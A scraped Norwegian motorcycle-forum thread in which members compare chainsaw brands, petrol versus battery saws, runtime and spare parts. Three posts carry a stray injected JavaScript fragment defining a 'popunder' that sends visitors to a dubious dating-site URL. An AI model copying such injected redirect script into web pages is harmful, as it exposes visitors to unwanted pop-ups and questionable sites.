Motorsag til hjem, hage og skog (ved) …

... prat om alt og ingenting, trenger ikke handle om MC.
Svar
Brukeravatar
dypen
Innlegg: 5217
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av dypen »

Var ute for å kjøpe ny stopp bryter til motorsaga i dag og som nevnt her var det lagervare og delen var merket Husqvarna :)

I samme slengen besøkte jeg både Husqvarna forhandler og Stihl forhandler som snakket sykt varmt om Japanske ECHO motorsag. Tilsvarende min Jonsered 520SP i motorstørrelser ville være saga i videoen her ECHO CS-4510ES

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
kjellv
Moderator
Innlegg: 6953
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av kjellv »

FredrikE24 skrev: 03 nov 2022, 18:01 Proff Husqvarna og Stihl er vel trygge valg. Førstnevnte er veldig lettstartet, høy kjedehastighet på kort tid.

De billige Husqvarna-sagene er samme sag som de billigere Jonsered og selges også under merket Partner. Helt ok sag til hjemmebruk.

Man får det man betaler for her også.
Helt korrekt. Disse er produsert av MC Cullock og selges også under dette navnet. Felles for dem alle er at de leveres med 12" eller 14" sverd og 3/8" kjede.

Brukeravatar
kjellv
Moderator
Innlegg: 6953
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av kjellv »

dypen skrev: 02 nov 2022, 23:17
kjellv skrev: 02 nov 2022, 21:11 Som gammel tømmerhugger/skogsarbeider, og etterhvert selger av blant annet Jonsered og nå Stihl og Echo har jeg en viss peiling..
Jonsered er som flere har vært inne på borte fra markedet. Electrolux motor har i mange år produsert og solgt sine forskjellige merker i konkurranse med hverandre, der Jonsered og Husqvarna har vært de to proffmerkene. De har i tillegg hatt MC Cullock og Partner som billigmerker gjennom hagesentre og billigkjeder, selv om også de billigste modellene fra Jonsered og Husqvarna har vært identiske med noen av modellene fra MC Cullock og Partner. For ca to år siden forsvant Jonsered helt, og disse selges nå kun som Husqvarna. Hos oss ble vi helt uten motorsager i butikken da Jonsered forsvant. Vi fikk ikke lov å selge Husqvarna da det er for mange Husqvarnaforhandlere i vårt område.
Men dere som er lykkelige eiere av Jonsered trenger ikke fortvile. Reservedeler og god support får dere hos Husqvarnaforhandlerne og de fleste tidligere Jonseredforhandlerne. Deler og varenumre er de samme, og nær sagt alle Jonsered har en orange halvbror i Husqvarna.

Vi har en tid solgt Echo, et gammelt og solid merke fra Japan. De har aldri fått noe godt fotfeste i Norge, og salget av disse har vært litt tungt. Det er synd, for dette er veldig gode og pålitelige sager. Nå har vi også gjort avtale med Stihl, og dette er nå straks på vei inn i hyllene hos oss.

Elektriske motorsager med batteri er nå på full fart inn i markedet. Dette begynner nå å bli bra greier, men ennå kan disse ikke erstatte de store proffsagene for tømmerhuggere. Men til ved og hage begynner de å gi skarp konkurranse. For mange kan dette være et godt alternativ.
Tar man det litt med ro og planlegger litt, kan man for eksempel skaffe seg forskjellige hageredskaper med samme batteritype og kan ha flere batterier tilgjengelig som kan brukes i alle de forskjellige redskapene man trenger. For eksempel hekksaks, gresstrimmer og motorsag.
https://www.stihl.no/STIHL-produkter/Ba ... 0-C-B.aspx
Er det noen kobling mellom Stihl og Echo … ser Grim Maskin her på Lillestrøm også selger Stihl og Echo…

Det var godt tips at jeg kan kjøpe deler fra Husqvarna :thumleft

Som jeg nevnte tideligere her i tråden har jeg mine tvil til batteri sag for en proff tømmerhogger.
Nei, det er ingen kobling mellom disse merkene. Echo importeres og distribueres i Norge gjennom Ariens.
Stihl har gjennom mange år vært sterkt knyttet til Felleskjøpet, men Felleskjøpet er ikke importør. I de senere år er det blitt mange flere forhandlere enn Felleskjøpet, og dette har skjedd samtidig som Stihl har utvidet produktspekteret dramatisk. Blant annet er de nå på vei inn i markedet med en ny generasjon IMOW robotklippere, og har virkelig blitt store på dette også. Når det gjelder motorsager er Stihl nå verdens største.

Brukeravatar
kjellv
Moderator
Innlegg: 6953
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av kjellv »

dypen skrev: 02 nov 2022, 23:09
Har mine tvil til om batteridrevet motorsag ville fungere for en skogsarbeider som hogger tømmer vinterstid fra før det er lyst på morningen til det er mørkt på kvelden men det er vel ikke disse du sikter til med profesjonelle. Hva kan du få ut av en batteri motorsag i skogen på trefelling … Det blir litt forskjell fra å fylle tanken fra medbrakt bensinkanne til å ha med en håndfull topplada batterier til saga. Har du erfaring …
Det er en berettiget tvil. Det er ennå et godt stykke igjen til batterisagene konkurrerer godt nok mot kraftige motorsager i proffmarkedet.
Jeg kom over en film på youtube heromdagen, der en Stihl MS261 proffsag sammenlignes med den nye batterisaga Stihl MSA300. Det var veldig interessant synes jeg, og batterisaga har virkelig prestasjoner som overrasker.
Men så i en annen film testes MSA300 i hardt sammenhengende arbeid, da holdt batteriet i 17 minutter før den gav seg. Det er nettopp der forskjellene ligger for skogsarbeiderens valg av motorsag. En tankfylling på ei MS261 holder i ca 50 min sammenhengende arbeid før tanken må fylles. En tømmerhogger hadde da tømt 3 batterier for å kunne jobbe like lenge. Det er også en utfordring å ha nok batterier tilgjengelig med seg ute i skogen når hvert batteri veier nær 2 kg og lademulighetene er begrenset. Det finnes ellers ladekassetter som rommer inntil 28 slike batterier, men den trenger 220V stikkontakt. Det blir nesten like dumt å benytte et bensinaggregat til lading av motorsagbatterier som det er å koble et dieselaggregat til strømforsyning av ei EL-gravemaskin :lol
Men utviklingen går raskt, og om et par år kan dette være løst.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Brukeravatar
dypen
Innlegg: 5217
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av dypen »

Bra prestasjon på batteri saga så lenge den går, den har AP500 batteri ser jeg.

I og med jeg har Stihl hekkesaks på batteri AP200 sjekket jeg ut om batteriet var kompatibelt med kjedesag og det var det.

Fikk sett på Stihl batteri kjedesag i dag og den billigste koster over det dobbelte av en god bensindrevet Echo CS310ES. Batteri saga på filmen her er priset til nesten det dobbelte av den minste batteri saga igjen.

Batteriet mitt AP200 er det minste batteriet som er kompatibelt med kjedesag og kanskje for lite i utgangspunktet når AP500 holdt i 17 minutter på full belastning på filmen.

Interessant å se hva som finnes og hvordan det funker men har du motorsag fra før som funker til litt pynting i hagen og kanskje noen vedkubber er det bedre å bruke kronene på noe annet ;) Hadde behovet vært der ville jeg helt klart valgt bensindrevet motorsag igjen.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

SilverSmurfer
Innlegg: 981
Registrert: 21 mai 2020, 21:02
Motorsykkelen din: Honda Forza 350

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av SilverSmurfer »

kjellv skrev: 03 nov 2022, 22:58
dypen skrev: 02 nov 2022, 23:09
Har mine tvil til om batteridrevet motorsag ville fungere for en skogsarbeider som hogger tømmer vinterstid fra før det er lyst på morningen til det er mørkt på kvelden men det er vel ikke disse du sikter til med profesjonelle. Hva kan du få ut av en batteri motorsag i skogen på trefelling … Det blir litt forskjell fra å fylle tanken fra medbrakt bensinkanne til å ha med en håndfull topplada batterier til saga. Har du erfaring …
Det er en berettiget tvil. Det er ennå et godt stykke igjen til batterisagene konkurrerer godt nok mot kraftige motorsager i proffmarkedet.
Jeg kom over en film på youtube heromdagen, der en Stihl MS261 proffsag sammenlignes med den nye batterisaga Stihl MSA300. Det var veldig interessant synes jeg, og batterisaga har virkelig prestasjoner som overrasker.
Men så i en annen film testes MSA300 i hardt sammenhengende arbeid, da holdt batteriet i 17 minutter før den gav seg. Det er nettopp der forskjellene ligger for skogsarbeiderens valg av motorsag. En tankfylling på ei MS261 holder i ca 50 min sammenhengende arbeid før tanken må fylles. En tømmerhogger hadde da tømt 3 batterier for å kunne jobbe like lenge. Det er også en utfordring å ha nok batterier tilgjengelig med seg ute i skogen når hvert batteri veier nær 2 kg og lademulighetene er begrenset. Det finnes ellers ladekassetter som rommer inntil 28 slike batterier, men den trenger 220V stikkontakt. Det blir nesten like dumt å benytte et bensinaggregat til lading av motorsagbatterier som det er å koble et dieselaggregat til strømforsyning av ei EL-gravemaskin :lol
Men utviklingen går raskt, og om et par år kan dette være løst.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Men de aller fleste av oss som kjøper motorsag er ikke skogsarbeidere. Vi hugger litt ved og beskjærer noen trær i hagen. Og til den typen bruk så er det ingen tvil om at jeg mye heller ville hatt en MSA300 over en MS261. Og 17 minutter med sammenhengende kutt tilsvarer ca 220 av kuttene vi ser 7 min 30 sekunder inn i videoen. Med batteribytte som tar i underkant av 10 sekunder.

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av FredrikE24 »

Skal man bruke elektrisk sag, så er det rette valget en med ledning.

mekkern
Innlegg: 7572
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av mekkern »

FredrikE24 skrev: 04 nov 2022, 06:21 Skal man bruke elektrisk sag, så er det rette valget en med ledning.
skal man bruke denne skjelden også så er batteriet tomt når en trenger det-og må lades før bruk.
Med ledning så putter man inn og full guff til en er ferdig. :prf

Er ikke motstander av batteriverktøy-har og bruker det masse men når det skal brukes en del effekt over tid-Da finnes andre løsninger.
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av FredrikE24 »

Yes, norsk fossekraft rett i kjeden

Omdal
Innlegg: 59
Registrert: 31 jan 2020, 16:31
Motorsykkelen din: Suzuki dl 1000 2019.
Sted: Sira. Flekkefjord

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av Omdal »

Om man skal ha en sag man bruker litt sporadisk inni mellom to 3 4 dager i året. Ville jeg aldri kjøpt med batteri. Siden man må huske å lade. Og hva skjer med ett batari som står ubrukt i måne vis år etter år? Og som dypen skriver har han en sag fra 1984. Jeg har to gammle veteran sager etter min far en fra 1979 og en fra 1985, begge proffsager med varme i håndtak. Disse ble mye brukt de første 10/15årene og har nå blitt erstattet av nyere modeller. Og kjøres noen få tanker i året bare får og holde di i gang. Men nåkk om det. Det jeg prøver og si er at om man kjøper ett ordentlig merke ikke i de billigste serien har man eg sag i 30 40 år. Nå går jo batteri teknologien med storm skritt. Men til nå foringes de vell forholds vis kjapt i forhold til en bensinmotor.
Suzuki dl 1000 v strom 2019.
Honda cbr 1000 f 1987.
Suzuki dr650 1993.
Kawasaki kle 500 2002.

Omdal
Innlegg: 59
Registrert: 31 jan 2020, 16:31
Motorsykkelen din: Suzuki dl 1000 2019.
Sted: Sira. Flekkefjord

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av Omdal »

Men ellers er batari verktøy utrolig bra. Bruker bare batteri verktøy i jobben. Drill. store muttertrekker, og sager til både stål og tre. Og blir stadig overrasket. Men dette er batarier på 5, 8,12, ampær. Så er jo forholdsvis dyre, er vell 2500kr for et 12 ampær. Men det trengs når man skal sage 2 meter i 10mm stålplate.
Suzuki dl 1000 v strom 2019.
Honda cbr 1000 f 1987.
Suzuki dr650 1993.
Kawasaki kle 500 2002.

Brukeravatar
dypen
Innlegg: 5217
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av dypen »

Hadde en prat med eier av Grim Maskin som kunne fortelle om kunder som kjøpte motorsag av han for 30 år siden som fortsatt var i drift og innom for kjøp av slitedeler, med slike produkter er det lett å være selger. Elektriske dyre kjedesager som ble solgt til proffmarkedet var utslitte etter fire fem år som var overaskende og uventet for han.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

SilverSmurfer
Innlegg: 981
Registrert: 21 mai 2020, 21:02
Motorsykkelen din: Honda Forza 350

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av SilverSmurfer »

Omdal skrev: 04 nov 2022, 19:51 Om man skal ha en sag man bruker litt sporadisk inni mellom to 3 4 dager i året. Ville jeg aldri kjøpt med batteri. Siden man må huske å lade. Og hva skjer med ett batari som står ubrukt i måne vis år etter år? Og som dypen skriver har han en sag fra 1984. Jeg har to gammle veteran sager etter min far en fra 1979 og en fra 1985, begge proffsager med varme i håndtak. Disse ble mye brukt de første 10/15årene og har nå blitt erstattet av nyere modeller. Og kjøres noen få tanker i året bare får og holde di i gang. Men nåkk om det. Det jeg prøver og si er at om man kjøper ett ordentlig merke ikke i de billigste serien har man eg sag i 30 40 år. Nå går jo batteri teknologien med storm skritt. Men til nå foringes de vell forholds vis kjapt i forhold til en bensinmotor.
Batteriene deles med andre verktøy, det var derfor jeg kjøpte Ryobi 18v. Da har jeg samme batteri i drillen som muttertrekkeren, plenklipperen og motorsagen.

Og det er trikset for alle som ikke bruker sagen så mye. Jeg har alltid 4 batterier som er fullladet, hvorav 2 er 5 amp batterier som passer godt til sagen. Men de andre funker også greit.
Sist redigert av SilverSmurfer den 05 nov 2022, 15:33, redigert 1 gang totalt.

Brukeravatar
dypen
Innlegg: 5217
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av dypen »

Helt klart ett poeng å ha samme batteri til mange verktøy :)
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Ketil
Innlegg: 613
Registrert: 07 jun 2012, 11:00
Motorsykkelen din: BMW1250GSA 2019
Sted: Pasvik

Re: Motorsag til hjem, hage og skog (ved) …

Legg inn av Ketil »

Etter mange år med bensinsager kjøpte jeg i fjor en batterisag, en Husqvarna. Gikk ikke for billigste modell da jeg ville ha en med manuell kjedestrammer. For prisen for sag med batteri og lader, kunne jeg helt klart kjøpt ei proff bensinsag og mye bensin. Jeg sager en del ved vinterstid og har også en «hage» på 7-8 mål som må pleies litt. Det jeg liker med batterisaga er at den er lett å ta med seg, bråker lite og ikke trenger å putre på tomgang når du ikke sager. Deilig også å slippe eksos. Jeg er imponert over hvor godt den sager og hvor hendig den er til kvisting av trær, men til større trefellinger hvor du trenger mer effekt er bensinsaga å foretrekke. Sist vinter brukte jeg batterisaga ofte når jeg var i vedteigen, og jeg fikk da saget et lass til sleden på ett batteri. Til saging av mindre trær og kvisting holder batteriet en liten halvtime. Så for de som ikke skal drive seriøs tømmerdrift, og bare skal sage litt ved og rydde i hagen, vil en moderne batterisag være helt utmerket.
Bilde


Sent from my iPad using Tapatalk

Svar